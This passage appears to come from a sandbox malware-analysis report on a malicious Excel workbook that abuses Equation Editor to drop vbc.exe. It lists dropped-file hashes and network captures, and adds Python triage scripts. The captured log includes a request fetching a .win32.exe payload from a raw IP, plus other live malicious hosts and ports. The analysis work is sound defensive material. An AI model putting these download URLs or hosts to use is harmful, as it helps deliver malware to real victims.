Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMP
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMP
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: CDFV2 Encrypted
Category: dropped
Size (bytes): 190456
Entropy (8bit): 7.95591459608079
Encrypted: false
SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB
MD5: E9FFC84ABF7ED6F6A7BE0C9E347B4245
SHA1: D636A41A99A022B242A810C972F4E6ADCC779ABA
SHA-256: 03D548395841B2296DEE9A96F1ACA44337F238311A0B01D6CF61C0D998BCC59A
SHA-512: 66CD17A968D1DA8DDB4CD912EBA36F7148B44483BB9D5C49A8D855F226920BF01DB1D57E08CF051F571B27952732C5EBBD97CDC17A5672F5E2C17F088079B1BC
Malicious: false
Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
C:\Users\user\Desktop\~$POAT2076452.xlsx
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
MD5: 797869BB881CFBCDAC2064F92B26E46F
SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious: true
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C:\Users\Public\vbc.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 14336
Entropy (8bit): 5.171700803602097
Encrypted: false
SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ
MD5: 980EC4304344F277D722024ADE08CD01
SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5
SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105
SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68
Malicious: true
Antivirus: ReversingLabs, Detection: 7%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................M... ...`....@.. ....................................@..................................M..S....`..............................PL............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@[email protected]..............@..B.................M......H........1..x.......9....................................................0..........(..........o...........s....(...+(...+.(.....8...........o....(...+....%..9......r...p([email protected](....-a..r...p(....-j..r#..p(....-s..r/..p(....:....8N......(.......2....i/...(.....8....r9..p(....8............(....(....8............(....(....8............(..........i0Ys........rU..po....&..rY..p.....(....(...+o....&..r_..po....&..o..........o....(....8....rc..p(....+v........(..........i0Vs
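The dropped-file records above give each file's size, 8-bit entropy and hashes, but a reader has to do the cross-checks by hand: the three 512-byte EXCEL.EXE temp files hash to the well-known values of 512 zero bytes, the "CDFV2 Encrypted" file carries the same MD5 as the submitted workbook in the Static File Info table that follows (Excel wrote the sample back to %TEMP%), several SQLite copies share one hash under different names, and the only PE was written by EQNEDT32.EXE. The Python below is an added example, not part of the Joe Sandbox report: it recomputes the entropy and digests the report shows for the zero-filled file, parses a constructed excerpt of the records above (values copied from the page; which ~DF*.TMP or tmp*.tmp name belongs to which record follows the order of the section above), and raises the flags a reviewer would act on. The flag names, the 7.5 entropy threshold and the list of Office writer processes are mine.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict

# Office-family writers: a PE dropped by one of these is the first thing to look at (my list).
OFFICE_PROCESSES = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE", "EQNEDT32.EXE"}
PATH_RE = re.compile(r"^[A-Za-z]:\\")          # a record heading is a Windows path


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the figure the report lists as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return abs(sum(c / n * math.log2(c / n) for c in Counter(data).values()))


def digests(data: bytes) -> dict:
    """Upper-case hex digests keyed like the report's rows."""
    return {"MD5": hashlib.md5(data).hexdigest().upper(),
            "SHA1": hashlib.sha1(data).hexdigest().upper(),
            "SHA-256": hashlib.sha256(data).hexdigest().upper()}


ZERO_SECTOR = digests(b"\x00" * 512)   # what a 512-byte all-zero file hashes to


def parse_records(text: str) -> list:
    """Turn the report's 'Key: Value' rows into dicts; a path line starts a new record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
            continue
        key, sep, value = line.partition(": ")
        if sep and current is not None:
            current[key] = value
    return records


def triage(records: list, sample_md5: str = None, high_entropy: float = 7.5) -> dict:
    """Map each path to the flags a reviewer would raise (flag names and threshold are mine)."""
    by_sha256 = defaultdict(list)
    for r in records:
        by_sha256[r.get("SHA-256")].append(r["path"])
    result = {}
    for r in records:
        flags = []
        writer = r.get("Process", "").rsplit("\\", 1)[-1].upper()
        if r.get("File Type", "").startswith("PE32") and writer in OFFICE_PROCESSES:
            flags.append("pe-written-by-office-process")
        if float(r.get("Entropy (8bit)", 0)) >= high_entropy:
            flags.append("high-entropy")
        if r.get("MD5") == ZERO_SECTOR["MD5"]:
            flags.append("zero-filled-512")
        if sample_md5 and r.get("MD5", "").lower() == sample_md5.lower():
            flags.append("copy-of-submitted-sample")
        if len(by_sha256[r.get("SHA-256")]) > 1:
            flags.append("duplicate-content")
        if r.get("Malicious") == "true":
            flags.append("sandbox-marked-malicious")
        result[r["path"]] = flags
    return result


# Constructed excerpt: values copied from the records above, cut down to the rows triage() reads.
REPORT_EXCERPT = r"""
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Entropy (8bit): 0.08107860342777487
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
Process: C:\Users\Public\vbc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Entropy (8bit): 0.08107860342777487
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
Malicious: false
C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Entropy (8bit): 0.0
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
Malicious: false
C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: CDFV2 Encrypted
Entropy (8bit): 7.95591459608079
MD5: E9FFC84ABF7ED6F6A7BE0C9E347B4245
SHA-256: 03D548395841B2296DEE9A96F1ACA44337F238311A0B01D6CF61C0D998BCC59A
Malicious: false
C:\Users\Public\vbc.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.171700803602097
MD5: 980EC4304344F277D722024ADE08CD01
SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105
Malicious: true
"""
SAMPLE_MD5 = "e9ffc84abf7ed6f6a7be0c9e347b4245"   # MD5 of POAT2076452.xlsx from the Static File Info table


def run() -> dict:
    return triage(parse_records(REPORT_EXCERPT), sample_md5=SAMPLE_MD5)


if __name__ == "__main__":
    for path, flags in run().items():
        print(f"{path}: {', '.join(flags) or '-'}")
```

Running it against a real report means pasting the whole dropped-files section in place of the excerpt; records that the sandbox marks `Malicious: false` still get flags here, which is the point of the pass.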
Static File Info
General
File type: CDFV2 Encrypted
Entropy (8bit): 7.95591459608079
TrID: Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: POAT2076452.xlsx
File size: 190456
MD5: e9ffc84abf7ed6f6a7be0c9e347b4245
SHA1: d636a41a99a022b242a810c972f4e6adcc779aba
SHA256: 03d548395841b2296dee9a96f1aca44337f238311a0b01d6cf61c0d998bcc59a
SHA512: 66cd17a968d1da8ddb4cd912eba36f7148b44483bb9d5c49a8d855f226920bf01db1d57e08cf051f571b27952732c5ebbd97cdc17a5672f5e2c17f088079b1bc
SSDEEP: 3072:q6+X3hQMFFQVv8V4J0aN0ZCQmVCzeKIhhw0J6il6qeFRJUVI0:yn6CCWVF20XECz9KIDgB
File Content Preview: ........................>......................................................................................................................................................................................................................................
File Icon
Icon Hash: e4e2aa8aa4b4bcb4
Network Behavior
Network Port Distribution
Total Packets: 41
• 53 (DNS)
• 443 (HTTPS)
• 80 (HTTP)
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Feb 22, 2022 15:30:27.291577101 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.612147093 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.613080025 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.613562107 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.935863018 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.935892105 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.935918093 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.935941935 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:27.936095953 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:28.257625103 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257653952 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257667065 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257680893 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257699013 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257715940 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257735014 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:28.257903099 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:28.257942915 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:29.473887920 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:31.191129923 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.191171885 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.191234112 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.335231066 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.335268974 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.380274057 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.386909962 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.405797958 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:31.405827999 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.406517982 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.613889933 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:31.614546061 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.029573917 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.069870949 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075445890 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075669050 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075745106 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.075767040 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075790882 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075895071 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075954914 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.075964928 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.075985909 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076024055 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076186895 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076256037 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076271057 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076289892 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076348066 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076383114 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076461077 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076531887 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076551914 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076627016 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076699972 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076720953 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076893091 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076961994 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.076966047 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.076987982 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077045918 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077070951 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077256918 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077327013 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077327967 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077346087 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077398062 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077429056 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077555895 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077625036 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077625036 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077644110 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077699900 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077717066 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077833891 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.077896118 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.077913046 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078008890 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078071117 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078082085 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078099966 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078150034 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078166962 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078284979 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078357935 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078371048 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078388929 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078440905 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078455925 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078524113 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078577995 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078589916 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078605890 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078656912 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078694105 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078831911 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.078896999 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.078911066 CET 443 49166 162.159.130.233 192.168.2.22
Feb 22, 2022 15:30:32.079989910 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.080538034 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.091418982 CET 443 49166 162.159.130.233 192.168.2.22
UDP Packets
Timestamp Source Port Dest Port Source IP Dest IP
Feb 22, 2022 15:30:31.089102983 CET 52167 53 192.168.2.22 8.8.8.8
Feb 22, 2022 15:30:31.109594107 CET 53 52167 8.8.8.8 192.168.2.22
Feb 22, 2022 15:30:32.150242090 CET 50591 53 192.168.2.22 8.8.8.8
Feb 22, 2022 15:30:32.183111906 CET 53 50591 8.8.8.8 192.168.2.22
Feb 22, 2022 15:30:47.212419987 CET 57805 53 192.168.2.22 8.8.8.8
Feb 22, 2022 15:30:47.265172005 CET 59030 53 192.168.2.22 8.8.8.8
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Feb 22, 2022 15:30:31.089102983 CET 192.168.2.22 8.8.8.8 0x1af8 Standard query (0) cdn.discordapp.com A (IP address) IN (0x0001)
Feb 22, 2022 15:30:32.150242090 CET 192.168.2.22 8.8.8.8 0x3b9 Standard query (0) olypath.com A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.212419987 CET 192.168.2.22 8.8.8.8 0x6392 Standard query (0) api.ip.sb A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.265172005 CET 192.168.2.22 8.8.8.8 0xaa45 Standard query (0) api.ip.sb A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.130.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.133.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.135.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.134.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.129.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:32.183111906 CET 8.8.8.8 192.168.2.22 0x3b9 No error (0) olypath.com 178.18.193.160 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.235760927 CET 8.8.8.8 192.168.2.22 0x6392 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)
Feb 22, 2022 15:30:47.282295942 CET 8.8.8.8 192.168.2.22 0xaa45 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)
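The DNS tables above account for only two of the destinations in the TCP table: cdn.discordapp.com and olypath.com were looked up before they were contacted, while 103.171.0.134 (the EQNEDT32.EXE download, sent with the literal IP in its Host header) and 179.43.175.99:21900 were reached with no DNS query at all, and api.ip.sb received only a CNAME answer in the capture. The Python below is an added example, not part of the report, that makes this join explicit: it maps A answers back to the names that were queried, labels every outbound TCP destination as resolved or raw-IP, and lists names that were queried but never got an A record. The rows are copied from the tables above; the two rows for 178.18.193.160 and 179.43.175.99 come from the HTTP Packets session tables that follow, with the timestamp of their first HTTP request, because the printed TCP table is cut off before those sessions. The label strings are mine.

```python
import re
from collections import defaultdict

SANDBOX_HOST = "192.168.2.22"

# Constructed from the TCP Packets table (first two destinations) and the HTTP Packets
# session tables (last two); one inbound row is included to show it is ignored.
TCP_ROWS = """
Feb 22, 2022 15:30:27.291577101 CET 49165 80 192.168.2.22 103.171.0.134
Feb 22, 2022 15:30:27.612147093 CET 80 49165 103.171.0.134 192.168.2.22
Feb 22, 2022 15:30:31.191129923 CET 49166 443 192.168.2.22 162.159.130.233
Feb 22, 2022 15:30:32.230215073 CET 49167 80 192.168.2.22 178.18.193.160
Feb 22, 2022 15:30:41.645224094 CET 49168 21900 192.168.2.22 179.43.175.99
"""
# Constructed from the DNS Queries / DNS Answers tables above (one A answer per name kept).
DNS_QUERIES = """
Feb 22, 2022 15:30:31.089102983 CET 192.168.2.22 8.8.8.8 0x1af8 Standard query (0) cdn.discordapp.com A (IP address) IN (0x0001)
Feb 22, 2022 15:30:32.150242090 CET 192.168.2.22 8.8.8.8 0x3b9 Standard query (0) olypath.com A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.212419987 CET 192.168.2.22 8.8.8.8 0x6392 Standard query (0) api.ip.sb A (IP address) IN (0x0001)
"""
DNS_ANSWERS = """
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.130.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.133.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:32.183111906 CET 8.8.8.8 192.168.2.22 0x3b9 No error (0) olypath.com 178.18.193.160 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.235760927 CET 8.8.8.8 192.168.2.22 0x6392 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)
"""

TCP_RE = re.compile(r"^(?P<ts>.+? CET) (?P<sport>\d+) (?P<dport>\d+) (?P<src>[\d.]+) (?P<dst>[\d.]+)$")
QUERY_RE = re.compile(r"Standard query \(0\) (?P<name>\S+) A \(")
ANSWER_RE = re.compile(r"No error \(0\) (?P<name>\S+) (?P<value>\S+) (?P<rtype>A|CNAME) \(")


def dns_map(answer_rows: str):
    """ip -> {names that resolved to it} from A answers, and name -> target from CNAME answers."""
    a_records, cnames = defaultdict(set), {}
    for line in answer_rows.strip().splitlines():
        m = ANSWER_RE.search(line)
        if not m:
            continue
        if m["rtype"] == "A":
            a_records[m["value"]].add(m["name"])
        else:
            cnames[m["name"]] = m["value"]
    return a_records, cnames


def label_destinations(tcp_rows: str, answer_rows: str, host: str = SANDBOX_HOST) -> list:
    """One entry per outbound (dst, port), labelled with the resolved name or as a raw-IP connection."""
    a_records, _ = dns_map(answer_rows)
    seen, out = set(), []
    for line in tcp_rows.strip().splitlines():
        m = TCP_RE.match(line)
        if not m or m["src"] != host:          # keep only what the sandbox host initiated
            continue
        key = (m["dst"], int(m["dport"]))
        if key in seen:
            continue
        seen.add(key)
        names = sorted(a_records.get(m["dst"], ()))
        out.append({"dst": key[0], "port": key[1], "first_seen": m["ts"], "names": names,
                    "label": ("resolved:" + ",".join(names)) if names else "raw-ip-no-dns"})
    return out


def unresolved_names(query_rows: str, answer_rows: str) -> set:
    """Names that were queried but never received an A record in the capture (CNAME-only counts)."""
    a_records, _ = dns_map(answer_rows)
    answered = set().union(*a_records.values()) if a_records else set()
    queried = {m["name"] for m in map(QUERY_RE.search, query_rows.strip().splitlines()) if m}
    return queried - answered


if __name__ == "__main__":
    for d in label_destinations(TCP_ROWS, DNS_ANSWERS):
        print(f"{d['dst']}:{d['port']}  {d['label']}  (first seen {d['first_seen']})")
    print("queried, no A answer:", sorted(unresolved_names(DNS_QUERIES, DNS_ANSWERS)))
```

Raw-IP destinations are the ones to pull into blocking first, since nothing in the capture ties them to a shared CDN name.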
HTTP Request Dependency Graph
cdn.discordapp.com
103.171.0.134
olypath.com
179.43.175.99:21900
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe
Timestamp kBytes transferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.22 49165 103.171.0.134 80 C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp kBytes transferred Direction Data
Feb 22, 2022 15:30:27.613562107 CET
0 OUT GET /_spaceX2__/.win32.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.171.0.134
Connection: Keep-Alive
Feb 22, 2022 15:30:27.935863018 CET
